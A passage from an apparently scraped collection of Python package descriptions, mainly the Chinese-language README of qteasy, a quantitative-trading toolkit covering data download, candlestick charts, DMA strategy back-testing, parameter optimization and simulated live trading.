to\ngo.qmatchatea simulationsQuantum circuit simulations via qmatchatea have qtealeaves as a\ndependency. Follow the instructions to install qmatchatea to get\nthe right version of qtealeaves.qgreentea simulationsIf you want to use the qgreentea toolchain with TTNs and aTTNS, you need to\ninstall qtealeaves under a matching version. qgreentea provides instructions\nwhich version is compatible; see installation instructions there. 
qgreentea\nis not yet public, but it will be made public step-by-step."} +{"package": "qteasy", "pacakge-description": "qteasy-- \u4e00\u4e2a\u672c\u5730\u5316\u3001\u7075\u6d3b\u6613\u7528\u7684\u9ad8\u6548\u91cf\u5316\u6295\u8d44\u5de5\u5177\u5305\u57fa\u672c\u4ecb\u7ecdQTEASY\u6587\u6863\u5b89\u88c5\u4f9d\u8d56\u5305\u5b89\u88c5qteasy\u5b89\u88c5\u4f9d\u8d56\u530510\u5206\u949f\u4e86\u89e3Qteasy\u7684\u529f\u80fd\u521d\u59cb\u914d\u7f6e\u2014\u2014\u672c\u5730\u6570\u636e\u6e90\u4e0b\u8f7d\u80a1\u7968\u4ef7\u683c\u5e76\u53ef\u89c6\u5316\u521b\u5efa\u6295\u8d44\u7b56\u7565\u6295\u8d44\u7b56\u7565\u7684\u56de\u6d4b\u548c\u8bc4\u4ef7\u6295\u8d44\u7b56\u7565\u7684\u4f18\u5316\u6295\u8d44\u7b56\u7565\u7684\u5b9e\u76d8\u8fd0\u884cNote:\u76ee\u524dqteays\u6b63\u5904\u4e8e\u5bc6\u96c6\u5f00\u53d1\u6d4b\u8bd5\u9636\u6bb5\uff0c\u8f6f\u4ef6\u4e2d\u4e0d\u514d\u5b58\u5728\u4e00\u4e9b\u6f0f\u6d1e\u548cbug\uff0c\u5982\u679c\u5927\u5bb6\u4f7f\u7528\u4e2d\u51fa\u73b0\u95ee\u9898\uff0c\u6b22\u8fceIssue-\u62a5\u544abug\u6216\u8005\u63d0\u4ea4\u65b0\u529f\u80fd\u9700\u6c42\u7ed9\u6211\uff0c\u4e5f\u53ef\u4ee5\u8fdb\u5165\u8ba8\u8bba\u533a\u53c2\u4e0e\u8ba8\u8bba\u3002\u4e5f\u6b22\u8fce\u5404\u4f4d\u8d21\u732e\u4ee3\u7801\uff01\u6211\u4f1a\u5c3d\u5feb\u4fee\u590d\u95ee\u9898\u5e76\u56de\u590d\u5927\u5bb6\u7684\u95ee\u9898\u3002\u5173\u4e8eqteasy\u4f5c\u8005:Jackie PENGemail:jackie_pengzhao@163.comCreated: 2019, July, 16Latest Version:1.0.26License: BSD 3-Clause Licenseqteasy\u662f\u4e3a\u91cf\u5316\u4ea4\u6613\u4eba\u5458\u5f00\u53d1\u7684\u4e00\u5957\u91cf\u5316\u4ea4\u6613\u5de5\u5177\u5305\uff0c\u7279\u70b9\u5982\u4e0b\uff1a\u5168\u6d41\u7a0b\u8986\u76d6\u4ece\u91d1\u878d\u6570\u636e\u83b7\u53d6\u3001\u5b58\u50a8\uff0c\u5230\u4ea4\u6613\u7b56\u7565\u7684\u5f00\u53d1\u3001\u56de\u6d4b\u3001\u4f18\u5316\u3001\u5b9e\u76d8\u8fd0\u884c\u5b8c\u5168\u672c\u5730\u5316\u6240\u6709\u7684\u91d1\u878d\u6570\u636e\u3001\u7b56\u7565\u8fd0\u7b97\u548c\u4f18\u5316\u8fc7\u7a0b\u5b8c\u5168\u672c\u5730\u5316\uff0c\u4e0d\u4f9d\u8d56\u4e8e\u4efb\u4f55\u4e91\u7aef\u670d\u52a1\u4f7f\u7528\u7b80\u5355\u63d0\u4f9b\u5927\u91cf\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\uff0c\u7528\u6237\u53ef\u4ee5\u642d\u79ef\u6728\u5f0f\u5730\u521b\u5efa\u81ea\u5df1\u7684\u4ea4\u6613\u7b56\u7565\u7075\u6d3b\u591a\u53d8\u4f7f\u7528qteasy\u63d0\u4f9b\u7684\u7b56\u7565\u7c7b\uff0c\u7528\u6237\u53ef\u4ee5\u81ea\u884c\u521b\u5efa\u81ea\u5df1\u7684\u4ea4\u6613\u7b56\u7565\uff0c\u7075\u6d3b\u8bbe\u7f6e\u53ef\u8c03\u53c2\u6570qteasy\u80fd\u505a\u4ec0\u4e48\uff1f\u91d1\u878d\u5386\u53f2\u6570\u636e:\u83b7\u53d6\u3001\u6e05\u6d17\u3001\u672c\u5730\u5b58\u50a8\u5927\u91cf\u91d1\u878d\u5386\u53f2\u6570\u636e\u68c0\u7d22\u3001\u5904\u7406\u3001\u8c03\u7528\u672c\u5730\u6570\u636e\u672c\u5730\u91d1\u878d\u6570\u636e\u53ef\u89c6\u5316\u521b\u5efa\u4ea4\u6613\u7b56\u7565\u63d0\u4f9b\u8fd1\u4e03\u5341\u79cd\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\uff0c\u53ef\u4ee5\u76f4\u63a5\u642d\u79ef\u6728\u5f0f\u4f7f\u7528\u5feb\u901f\u521b\u5efa\u81ea\u5b9a\u4e49\u4ea4\u6613\u7b56\u7565\uff0c\u7075\u6d3b\u8bbe\u7f6e\u53ef\u8c03\u53c2\u6570\u4ea4\u6613\u7b56\u7565\u7684\u56de\u6d4b\u3001\u4f18\u5316\u3001\u8bc4\u4ef7\uff0c\u53ef\u89c6\u5316\u8f93\u51fa\u56de\u6d4b\u7ed3\u679c\u5b9e\u76d8\u4ea4\u6613\u6a21\u62df\u8bfb\u53d6\u5b9e\u65f6\u5e02\u573a\u6570\u636e\uff0c\u5b9e\u76d8\u8fd0\u884c\u4ea4\u6613\u7b56\u7565\u751f\u6210\u4ea4\u6613\u4fe1\u53f7\uff0c\u6a21\u62df\u4ea4\u6613\u7ed3\u679c\u8ddf\u8e2a\u8bb0\u5f55\u4ea4\u6613\u65e5\u5fd7\u3001\u80a1\u7968\u6301\u4ed3\u3001\u8d26\u6237\u8d
44\u91d1\u53d8\u5316\u7b49\u4fe1\u606f\u968f\u65f6\u67e5\u770b\u4ea4\u6613\u8fc7\u7a0b\uff0c\u68c0\u67e5\u76c8\u4e8f\u60c5\u51b5\u624b\u52a8\u63a7\u5236\u4ea4\u6613\u8fdb\u7a0b\u3001\u8c03\u6574\u4ea4\u6613\u53c2\u6570\uff0c\u624b\u52a8\u4e0b\u5355\u5b89\u88c5$pipinstallqteasy\u6587\u6863\u5173\u4e8eQTEASY\u7cfb\u7edf\u7684\u66f4\u591a\u8be6\u7ec6\u89e3\u91ca\u548c\u4f7f\u7528\u65b9\u6cd5\uff0c\u8bf7\u53c2\u9605QTEASY\u6587\u6863\uff1apython \u7248\u672cpythonversion >= 3.6\u5b89\u88c5\u53ef\u9009\u4f9d\u8d56\u5305qteasy\u6240\u6709\u5fc5\u8981\u7684\u4f9d\u8d56\u5305\u90fd\u53ef\u4ee5\u5728pip\u5b89\u88c5\u7684\u540c\u65f6\u5b89\u88c5\u597d\uff0c\u4f46\u5982\u679c\u9700\u8981\u4f7f\u7528qteasy\u7684\u5168\u90e8\u529f\u80fd\uff0c\u9700\u8981\u5b89\u88c5\u4ee5\u4e0b\u4f9d\u8d56\u5305\uff1ata-lib: == 0.4.18, \u7528\u4e8e\u8ba1\u7b97\u6280\u672f\u6307\u6807pymysql: == 1.0.2, \u7528\u4e8e\u8fde\u63a5MySQL\u6570\u636e\u5e93,\u5c06\u672c\u5730\u6570\u636e\u5b58\u50a8\u5230MySQL\u6570\u636e\u5e93\uff08qteasy\u9ed8\u8ba4\u4f7f\u7528csv\u6587\u4ef6\u4f5c\u4e3a\u672c\u5730\u6570\u636e\u6e90\uff0c\u4f46\u6570\u636e\u91cf\u5927\u65f6\u63a8\u8350\u4f7f\u7528mysql\u6570\u636e\u5e93\uff0c\u8be6\u60c5\u53c2\u89c1qteasy\u4f7f\u7528\u6559\u7a0b\uff0910\u5206\u949f\u4e86\u89e3qteasy\u7684\u529f\u80fd\u5bfc\u5165qteasy\u57fa\u672c\u7684\u6a21\u5757\u5bfc\u5165\u65b9\u6cd5\u5982\u4e0bimportqteasyasqtprint(qt.__version__)\u914d\u7f6e\u672c\u5730\u6570\u636e\u6e90\u4e3a\u4e86\u4f7f\u7528qteasy\uff0c\u9700\u8981\u5927\u91cf\u7684\u91d1\u878d\u5386\u53f2\u6570\u636e\uff0c\u6240\u6709\u7684\u5386\u53f2\u6570\u636e\u90fd\u5fc5\u987b\u9996\u5148\u4fdd\u5b58\u5728\u672c\u5730\uff0c\u5982\u679c\u672c\u5730\u6ca1\u6709\u5386\u53f2\u6570\u636e\uff0c\u90a3\u4e48qteasy\u7684\u8bb8\u591a\u529f\u80fd\u5c31\u65e0\u6cd5\u6267\u884c\u3002qteasy\u9ed8\u8ba4\u901a\u8fc7tushare\u91d1\u878d\u6570\u636e\u5305\u6765\u83b7\u53d6\u5927\u91cf\u7684\u91d1\u878d\u6570\u636e\uff0c\u7528\u6237\u9700\u8981\u81ea\u884c\u7533\u8bf7API Token\uff0c\u83b7\u53d6\u76f8\u5e94\u7684\u6743\u9650\u548c\u79ef\u5206\uff08\u8be6\u60c5\u53c2\u8003\uff1ahttps://tushare.pro/document/2\uff09\u56e0\u6b64\uff0c\u5728\u4f7f\u7528qteasy\u4e4b\u524d\u9700\u8981\u5bf9\u672c\u5730\u6570\u636e\u6e90\u548ctushare\u8fdb\u884c\u5fc5\u8981\u7684\u914d\u7f6e\u3002\u5728QT_ROOT_PATH/qteasy/\u8def\u5f84\u4e0b\u6253\u5f00\u914d\u7f6e\u6587\u4ef6qteasy.cfg\uff0c\u53ef\u4ee5\u770b\u5230\u4e0b\u9762\u5185\u5bb9\uff1a# qteasy configuration file\n# following configurations will be loaded when initialize qteasy\n\n# example:\n# local_data_source = database\u914d\u7f6etushare token\u5c06\u4f60\u83b7\u5f97\u7684tushare API token\u6dfb\u52a0\u5230\u914d\u7f6e\u6587\u4ef6\u4e2d\uff0c\u5982\u4e0b\u6240\u793a\uff1atushare_token = <\u4f60\u7684tushare API Token>\u914d\u7f6e\u672c\u5730\u6570\u636e\u6e90 \u2014\u2014 \u7528MySQL\u6570\u636e\u5e93\u4f5c\u4e3a\u672c\u5730\u6570\u636e\u6e90\u9ed8\u8ba4\u60c5\u51b5\u4e0bqteasy\u4f7f\u7528\u5b58\u50a8\u5728data/\u8def\u5f84\u4e0b\u7684.csv\u6587\u4ef6\u4f5c\u4e3a\u6570\u636e\u6e90\uff0c\u4e0d\u9700\u8981\u7279\u6b8a\u8bbe\u7f6e\u3002\n\u5982\u679c\u8bbe\u7f6e\u4f7f\u7528mysql\u6570\u636e\u5e93\u4f5c\u4e3a\u672c\u5730\u6570\u636e\u6e90\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u6dfb\u52a0\u4ee5\u4e0b\u914d\u7f6e\uff1alocal_data_source = database \n\nlocal_db_host = \nlocal_db_port = \nlocal_db_user = \nlocal_db_password = \nlocal_db_name = 
\u5173\u95ed\u5e76\u4fdd\u5b58\u597d\u914d\u7f6e\u6587\u4ef6\u540e\uff0c\u91cd\u65b0\u5bfc\u5165qteasy\uff0c\u5c31\u5b8c\u6210\u4e86\u6570\u636e\u6e90\u7684\u914d\u7f6e\uff0c\u53ef\u4ee5\u5f00\u59cb\u4e0b\u8f7d\u6570\u636e\u5230\u672c\u5730\u4e86\u3002\u4e0b\u8f7d\u91d1\u878d\u5386\u53f2\u6570\u636e\u8981\u4e0b\u8f7d\u91d1\u878d\u4ef7\u683c\u6570\u636e\uff0c\u4f7f\u7528qt.refill_data_source()\u51fd\u6570\u3002\u4e0b\u9762\u7684\u4ee3\u7801\u4e0b\u8f7d2021\u53ca2022\u4e24\u5e74\u5185\u6240\u6709\u80a1\u7968\u3001\u6240\u6709\u6307\u6570\u7684\u65e5K\u7ebf\u6570\u636e\uff0c\u540c\u65f6\u4e0b\u8f7d\u6240\u6709\u7684\u80a1\u7968\u548c\u57fa\u91d1\u7684\u57fa\u672c\u4fe1\u606f\u6570\u636e\u3002\n\uff08\u6839\u636e\u7f51\u7edc\u901f\u5ea6\uff0c\u4e0b\u8f7d\u6570\u636e\u53ef\u80fd\u9700\u8981\u5341\u5206\u949f\u5de6\u53f3\u7684\u65f6\u95f4\uff0c\u5982\u679c\u5b58\u50a8\u4e3acsv\u6587\u4ef6\uff0c\u5c06\u5360\u7528\u5927\u7ea6200MB\u7684\u78c1\u76d8\u7a7a\u95f4\uff09\uff1aqt.refill_data_source(tables=['stock_daily',# \u80a1\u7968\u7684\u65e5\u7ebf\u4ef7\u683c'index_daily',# \u6307\u6570\u7684\u65e5\u7ebf\u4ef7\u683c'basics'],# \u80a1\u7968\u548c\u57fa\u91d1\u7684\u57fa\u672c\u4fe1\u606fstart_date='20210101',# \u4e0b\u8f7d\u6570\u636e\u7684\u8d77\u6b62\u65f6\u95f4end_date='20221231',)\u6570\u636e\u4e0b\u8f7d\u5230\u672c\u5730\u540e\uff0c\u53ef\u4ee5\u4f7f\u7528qt.get_history_data()\u6765\u83b7\u53d6\u6570\u636e\uff0c\u5982\u679c\u540c\u65f6\u83b7\u53d6\u591a\u4e2a\u80a1\u7968\u7684\u5386\u53f2\u6570\u636e\uff0c\u6bcf\u4e2a\u80a1\u7968\u7684\u5386\u53f2\u6570\u636e\u4f1a\u88ab\u5206\u522b\u4fdd\u5b58\u5230\u4e00\u4e2adict\u4e2d\u3002qt.get_history_data(htypes='open, high, low, close',shares='000001.SZ, 000300.SH',start='20210101',end='20210115')\u8fd0\u884c\u4e0a\u8ff0\u4ee3\u7801\u4f1a\u5f97\u5230\u4e00\u4e2aDict\u5bf9\u8c61\uff0c\u5305\u542b\u4e24\u4e2a\u80a1\u7968\"000001.SZ\"\u4ee5\u53ca\"000005.SZ\"\u7684K\u7ebf\u6570\u636e\uff08\u6570\u636e\u5b58\u50a8\u4e3aDataFrame\uff09\uff1a{'000001.SZ':\n open high low close\n 2021-01-04 19.10 19.10 18.44 18.60\n 2021-01-05 18.40 18.48 17.80 18.17\n 2021-01-06 18.08 19.56 18.00 19.56\n ... 
\n 2021-01-13 21.00 21.01 20.40 20.70\n 2021-01-14 20.68 20.89 19.95 20.17\n 2021-01-15 21.00 21.95 20.82 21.00,\n \n '000300.SH':\n open high low close\n 2021-01-04 5212.9313 5284.4343 5190.9372 5267.7181\n 2021-01-05 5245.8355 5368.5049 5234.3775 5368.5049\n 2021-01-06 5386.5144 5433.4694 5341.4304 5417.6677\n ...\n 2021-01-13 5609.2637 5644.7195 5535.1435 5577.9711\n 2021-01-14 5556.2125 5568.0179 5458.6818 5470.4563\n 2021-01-15 5471.3910 5500.6348 5390.2737 5458.0812}\u9664\u4e86\u4ef7\u683c\u6570\u636e\u4ee5\u5916\uff0cqteasy\u8fd8\u53ef\u4ee5\u4e0b\u8f7d\u5e76\u7ba1\u7406\u5305\u62ec\u8d22\u52a1\u62a5\u8868\u3001\u6280\u672f\u6307\u6807\u3001\u57fa\u672c\u9762\u6570\u636e\u7b49\u5728\u5185\u7684\u5927\u91cf\u91d1\u878d\u6570\u636e\uff0c\u8be6\u60c5\u8bf7\u53c2\u89c1qteasy\u6587\u6863\u80a1\u7968\u7684\u6570\u636e\u4e0b\u8f7d\u540e\uff0c\u4f7f\u7528qt.candle()\u53ef\u4ee5\u663e\u793a\u80a1\u7968\u6570\u636eK\u7ebf\u56fe\u3002importqteasyasqtdata=qt.candle('000300.SH',start='2021-06-01',end='2021-8-01',asset_type='IDX')qteasy\u7684K\u7ebf\u56fe\u51fd\u6570candle\u652f\u6301\u901a\u8fc7\u516d\u4f4d\u6570\u80a1\u7968/\u6307\u6570\u4ee3\u7801\u67e5\u8be2\u51c6\u786e\u7684\u8bc1\u5238\u4ee3\u7801\uff0c\u4e5f\u652f\u6301\u901a\u8fc7\u80a1\u7968\u3001\u6307\u6570\u540d\u79f0\u663e\u793aK\u7ebf\u56feqt.candle()\u652f\u6301\u529f\u80fd\u5982\u4e0b\uff1a\u663e\u793a\u80a1\u7968\u3001\u57fa\u91d1\u3001\u671f\u8d27\u7684K\u7ebf\u663e\u793a\u590d\u6743\u4ef7\u683c\u663e\u793a\u5206\u949f\u3001 \u5468\u6216\u6708K\u7ebf\u663e\u793a\u4e0d\u540c\u79fb\u52a8\u5747\u7ebf\u4ee5\u53caMACD/KDJ\u7b49\u6307\u6807\u8be6\u7ec6\u7684\u7528\u6cd5\u8bf7\u53c2\u8003\u6587\u6863\uff0c\u793a\u4f8b\u5982\u4e0b(\u8bf7\u5148\u4f7f\u7528qt.refill_data_source()\u4e0b\u8f7d\u76f8\u5e94\u7684\u5386\u53f2\u6570\u636e)\uff1aimportqteasyasqt# \u573a\u5185\u57fa\u91d1\u7684\u5c0f\u65f6K\u7ebf\u56feqt.candle('159601',start='20220121',freq='h')# \u6caa\u6df1300\u6307\u6570\u7684\u65e5K\u7ebf\u56feqt.candle('000300',start='20200121')# \u80a1\u7968\u768430\u5206\u949fK\u7ebf\uff0c\u590d\u6743\u4ef7\u683cqt.candle('\u4e2d\u56fd\u7535\u4fe1',start='20211021',freq='30min',adj='b')# \u671f\u8d27K\u7ebf\uff0c\u4e09\u6761\u79fb\u52a8\u5747\u7ebf\u5206\u522b\u4e3a9\u5929\u300112\u5929\u300126\u5929qt.candle('\u6caa\u94dc\u4e3b\u529b',start='20211021',mav=[9,12,26])# 
\u573a\u5916\u57fa\u91d1\u51c0\u503c\u66f2\u7ebf\u56fe\uff0c\u590d\u6743\u51c0\u503c\uff0c\u4e0d\u663e\u793a\u79fb\u52a8\u5747\u7ebfqt.candle('000001.OF',start='20200101',asset_type='FD',adj='b',mav=[])\u751f\u6210\u7684K\u7ebf\u56fe\u53ef\u4ee5\u662f\u4e00\u4e2a\u4ea4\u4e92\u5f0f\u52a8\u6001K\u7ebf\u56fe\uff08\u8bf7\u6ce8\u610f\uff0cK\u7ebf\u56fe\u57fa\u4e8ematplotlib\u7ed8\u5236\uff0c\u5728\u4f7f\u7528\u4e0d\u540c\u7684\u7ec8\u7aef\u65f6\uff0c\u663e\u793a\u529f\u80fd\u6709\u6240\u533a\u522b\uff0c\u67d0\u4e9b\u7ec8\u7aef\u5e76\u4e0d\u652f\u6301\n\u52a8\u6001\u56fe\u8868\uff0c\u8be6\u60c5\u8bf7\u53c2\u9605matplotlib\u6587\u6863\u5728\u4f7f\u7528\u52a8\u6001K\u7ebf\u56fe\u65f6\uff0c\u7528\u6237\u53ef\u4ee5\u7528\u9f20\u6807\u548c\u952e\u76d8\u63a7\u5236K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\uff1a\u9f20\u6807\u5728\u56fe\u8868\u4e0a\u5de6\u53f3\u62d6\u52a8\uff1a\u53ef\u4ee5\u79fb\u52a8K\u7ebf\u56fe\u663e\u793a\u66f4\u65e9\u6216\u66f4\u665a\u7684K\u7ebf\u9f20\u6807\u6eda\u8f6e\u5728\u56fe\u8868\u4e0a\u6eda\u52a8\uff0c\u53ef\u4ee5\u7f29\u5c0f\u6216\u653e\u5927K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\u901a\u8fc7\u952e\u76d8\u5de6\u53f3\u65b9\u5411\u952e\uff0c\u53ef\u4ee5\u79fb\u52a8K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\u663e\u793a\u66f4\u65e9\u6216\u66f4\u665a\u7684K\u7ebf\u901a\u8fc7\u952e\u76d8\u4e0a\u4e0b\u952e\uff0c\u53ef\u4ee5\u7f29\u5c0f\u6216\u653e\u5927K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\u5728K\u7ebf\u56fe\u4e0a\u53cc\u51fb\u9f20\u6807\uff0c\u53ef\u4ee5\u5207\u6362\u4e0d\u540c\u7684\u5747\u7ebf\u7c7b\u578b\u5728K\u7ebf\u56fe\u7684\u6307\u6807\u533a\u57df\u53cc\u51fb\uff0c\u53ef\u4ee5\u5207\u6362\u4e0d\u540c\u7684\u6307\u6807\u7c7b\u578b\uff1aMACD\uff0cRSI\uff0cDEMA\u5173\u4e8eDataSource\u5bf9\u8c61\u7684\u66f4\u591a\u8be6\u7ec6\u4ecb\u7ecd\uff0c\u8bf7\u53c2\u89c1qteasy\u6587\u6863\u521b\u5efa\u4e00\u4e2a\u6295\u8d44\u7b56\u7565qteasy\u4e2d\u7684\u6240\u6709\u4ea4\u6613\u7b56\u7565\u90fd\u662f\u7531qteast.Operator\uff08\u4ea4\u6613\u5458\uff09\u5bf9\u8c61\u6765\u5b9e\u73b0\u56de\u6d4b\u548c\u8fd0\u884c\u7684\uff0cOperator\u5bf9\u8c61\u662f\u4e00\u4e2a\u7b56\u7565\u5bb9\u5668\uff0c\u4e00\u4e2a\u4ea4\u6613\u5458\u53ef\u4ee5\u540c\u65f6\n\u7ba1\u7406\u591a\u4e2a\u4e0d\u540c\u7684\u4ea4\u6613\u7b56\u7565\u3002queasy\u63d0\u4f9b\u4e86\u4e24\u79cd\u65b9\u5f0f\u521b\u5efa\u4ea4\u6613\u7b56\u7565\uff0c\u8be6\u7ec6\u7684\u8bf4\u660e\u8bf7\u53c2\u89c1\u4f7f\u7528\u6559\u7a0b\uff1a\u4f7f\u7528\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\u7ec4\u5408\u901a\u8fc7\u7b56\u7565\u7c7b\u81ea\u884c\u521b\u5efa\u7b56\u7565\u751f\u6210\u4e00\u4e2aDMA\u5747\u7ebf\u62e9\u65f6\u4ea4\u6613\u7b56\u7565\u5728\u8fd9\u91cc\uff0c\u6211\u4eec\u5c06\u4f7f\u7528\u4e00\u4e2a\u5185\u7f6e\u7684DMA\u5747\u7ebf\u62e9\u65f6\u7b56\u7565\u6765\u751f\u6210\u4e00\u4e2a\u6700\u7b80\u5355\u7684\u5927\u76d8\u62e9\u65f6\u4ea4\u6613\u7cfb\u7edf\u3002\u6240\u6709\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\u7684\u6e05\u5355\u548c\u8be6\u7ec6\u8bf4\u660e\u8bf7\u53c2\u89c1\u6587\u6863\u3002\u521b\u5efaOperator\u5bf9\u8c61\u65f6\u4f20\u5165\u53c2\u6570\uff1astrategies='DMA'\uff0c\u53ef\u4ee5\u65b0\u5efa\u4e00\u4e2aDMA\u53cc\u5747\u7ebf\u62e9\u65f6\u4ea4\u6613\u7b56\u7565\u3002\n\u521b\u5efa\u597dOperator\u5bf9\u8c61\u540e\uff0c\u53ef\u4ee5\u7528op.info()\u6765\u67e5\u770b\u5b83\u7684\u4fe1\u606f\u3002importqteasyasqtop=qt.Operator(strategies='dma')op.info()\u73b0\u5728\u53ef\u4ee5\u770b\u5230op\u4e2d\u6709\u4e00\u4e2a\u4ea4\u6613\u7b56\u7565\uff0cID\u662fdma\uff0c\u6211\u4eec\u5728Operator\u5c42\u9762\u8bbe\u7f6e\u6216\u4fee\u6539\u7b
the parameters of a strategy, this ID must be referenced. DMA is a built-in moving-average timing strategy: it computes DMA, the difference between a fast and a slow moving average of the daily closing price, and uses the crossings between DMA and its own moving average (AMA) to decide long/short regimes and buy/sell points. Use the qt.built_ins() function to view the details of the DMA strategy, for example:

import qteasy as qt
qt.built_ins('dma')

which prints:

DMA timing strategy

    Strategy parameters:
        s, int, fast moving-average period
        l, int, slow moving-average period
        d, int, DMA period
    Signal type:
        PS: percentage buy/sell trade signals
    Signal rules:
        Buy signals are generated in the following situations:
        1. When DMA is above AMA (long regime), i.e. after the DMA line crosses the AMA line from below, the output is 1
        2. When DMA is below AMA (short regime), i.e. after the DMA line crosses the AMA line from above, the output is 0
        3. Cross signals that occur while DMA diverges from the price are considered more reliable

    Default strategy properties:
    Default parameters: (12, 26, 9)
    Data type: close (closing price), single data input
    Sampling frequency: daily
    Window length: 270
    Parameter ranges: [(10, 250), (10, 250), (8, 250)]
    The strategy supports neither reference data nor trade data

By default the strategy has three tunable parameters, (12, 26, 9), but any three integers greater than 2 and smaller than 250 can be passed as parameters, to adapt the strategy to stocks with different levels of trading activity or to different run frequencies.

Back-testing and evaluating the performance of a trading strategy

qteasy can back-test a strategy on historical data and produce charts like the ones below. To back-test the DMA strategy we just created with its default parameters, use op.run():

import qteasy as qt

op = qt.Operator(strategies='dma')
res = op.run(
    mode=1,                        # historical back-test mode
    asset_pool='000300.SH',        # investment pool, i.e. the stocks or indices that may be traded; here the CSI 300 index
    asset_type='IDX',              # asset type: IDX for index, E for equity
    invest_cash_amounts=[100000],  # initial investment, here 100,000 yuan
    invest_start='20220501',       # back-test start date
    invest_end='20221231',         # back-test end date
    cost_rate_buy=0.0003,          # buy-side fee rate, here 0.03%
    cost_rate_sell=0.0001,         # sell-side fee rate, here 0.01%
    visual=True,                   # plot the back-test charts
    trade_log=True                 # print the trade log
)

The output looks like this:

====================================
|                                  |
|       BACK TESTING RESULT        |
|                                  |
====================================

qteasy running mode: 1 - History back testing
time consumption for operate signal creation: 4.4 ms
time consumption for operation back looping: 82.5 ms

investment starts on 2022-05-05 00:00:00
ends on 2022-12-30 00:00:00
Total looped periods: 0.7 years.

-------------operation summary:------------
Only non-empty shares are displayed, call 
"loop_result["oper_count"]" for complete operation summary

          Sell Cnt Buy Cnt Total Long pct Short pct Empty pct
000300.SH 6        6       12    56.4%    0.0%      43.6% 

Total operation fee:     ¥        257.15
total investment amount: ¥    100,000.00
final value:             ¥    105,773.09
Total return:                      5.77% 
Avg Yearly return:                 8.95%
Skewness:                           0.58
Kurtosis:                           3.54
Benchmark return:                  -3.46% 
Benchmark Yearly return:           -5.23%

------strategy loop_results indicators------ 
alpha:                             0.142
Beta:                              1.003
Sharp ratio:                       0.637
Info ratio:                        0.132
250 day volatility:                0.138
Max drawdown:                     11.92% 
    peak / valley:        2022-08-17 / 2022-10-31
    recovered on:         Not recovered!

===========END OF REPORT=============

Tuning the parameters of a trading strategy

A strategy's performance depends on its parameters; different parameter values can produce very different returns. qteasy offers several optimization algorithms to search for the best strategy parameters. To use the optimizer, set the strategy's optimization tag opt_tag=1 and set the configuration variable mode=2:

import qteasy as qt

op = qt.Operator(strategies='dma')
op.set_parameter('dma', opt_tag=1)
res = op.run(
    mode=2,                    # optimization mode
    opti_start='20220501',     # start of the optimization period
    opti_end='20221231',       # end of the optimization period
    test_start='20220501',     # start of the test period
    test_end='20221231',       # end of the test period
    opti_sample_count=1000,    # number of optimization samples
    visual=True,               # plot the optimization results
    parallel=False             # do not use parallel computation
)

qteasy back-tests repeatedly on the same slice of history (the optimization period), finds the 30 best-performing parameter sets, then tests those 30 sets independently on another slice of history (the test period) and reports the results of the independent test:

==================================== 
|                                  |
|       OPTIMIZATION RESULT        |
|                                  |
====================================

qteasy running mode: 2 - Strategy Parameter Optimization

...
# part of the output is omitted

# below are the 30 optimized parameter sets and their results (some rows omitted)
    Strategy items  Sell-outs  Buy-ins  ttl-fee          FV    ROI  Benchmark rtn   MDD 
0   (35, 69, 60)          1.0      2.0    71.45  106,828.20   6.8%          -3.5%  9.5%
1   (124, 104, 18)        3.0      2.0   124.86  106,900.59   6.9%          -3.5%  7.4%
2   (126, 120, 56)        1.0      1.0    72.38  107,465.86   7.5%          -3.5%  7.5%
...
27  (103, 84, 70)         1.0      1.0    74.84  114,731.44  14.7%          -3.5%  8.8%
28  (143, 103, 49)        1.0      1.0    74.33  116,453.26  16.5%          -3.5%  4.3%
29  (129, 92, 56)         1.0      1.0    74.55  118,811.58  18.8%          -3.5%  4.3%

===========END OF REPORT=============

Apply the optimized parameters to the strategy and back-test again; the results improve noticeably:

op.set_parameter('dma', pars=(143, 99, 32))
res = op.run(
    mode=1,                        # historical back-test mode
    asset_pool='000300.SH',        # investment pool
    asset_type='IDX',              # asset type
    invest_cash_amounts=[100000],  # investment amount
    invest_start='20220501',       # back-test start date
    invest_end='20221231',         # back-test end date
    cost_rate_buy=0.0003,          # buy-side fee rate
    cost_rate_sell=0.0001,         # sell-side fee rate
    visual=True,                   # plot the back-test charts
    trade_log=True,                # print the trade log
)

The results are shown below. For more on interpreting the optimization results and for the remaining optimization parameters, see the full documentation.

Deploying a trading strategy for live trading

qteasy provides a simple live-trading program that runs in a command-line environment. Once the Operator object has been configured and the strategies set up, it runs the strategies on a schedule, watches the market, downloads real-time data, generates trade orders from the strategy results, simulates the trading process and records the results. After the trading strategies and the trading parameters have been configured in the Operator, live trading can be started directly:

import qteasy as qt

# create a trading strategy "alpha"
alpha = qt.get_built_in_strategy('ndayrate')  # an N-day price-change strategy

# set the strategy's run parameters
alpha.strategy_run_freq = 'd'   # run every day
alpha.data_freq = 'd'           # the strategy uses daily data
alpha.window_length = 20        # data window length
alpha.sort_ascending = False    # prefer the stocks with the largest gains
alpha.condition = 'greater'     # keep only stocks whose gain exceeds a threshold
alpha.ubound = 0.005            # keep stocks that gained more than 0.5%
alpha.sel_count = 7             # pick 7 stocks each time

# create an Operator to run the alpha strategy
op = qt.Operator(alpha, signal_type='PT', op_type='step')

# set the run parameters
# the trading pool contains all bank and household-appliance stocks
asset_pool = qt.filter_stock_codes(industry='银行, 家用电器', exchange='SSE, SZSE')

qt.configure(
    mode=0,                          # live-trading mode
    asset_type='E',                  # the traded assets are stocks
    asset_pool=asset_pool,           # trade all bank and household-appliance stocks
    trade_batch_size=100,            # buy in multiples of 100 shares
    sell_batch_size=1,               # sell in multiples of 1 share
    live_trade_account_id=1,         # live-trading account ID
    live_trade_account='user name',  # live-trading user name
)
qt.run(op)

qteasy then starts a Trader Shell command-line interface, and the trading strategies run automatically on schedule with the run parameters taken from QT_CONFIG. Once the TraderShell is running, all important trading information is shown in the console: the current execution status (date, time, run state), the generated trade signals and orders, order fills, changes in account cash, changes in account positions, announcements of the market open and close times, and so on.

While the TraderShell is running you can press Ctrl+C at any time to open the shell menu:

Current mode interrupted, Input 1 or 2 or 3 for below options: 
[1], Enter command mode; 
[2], Enter dashboard mode. 
[3], Exit and stop the trader; 
please input your choice:

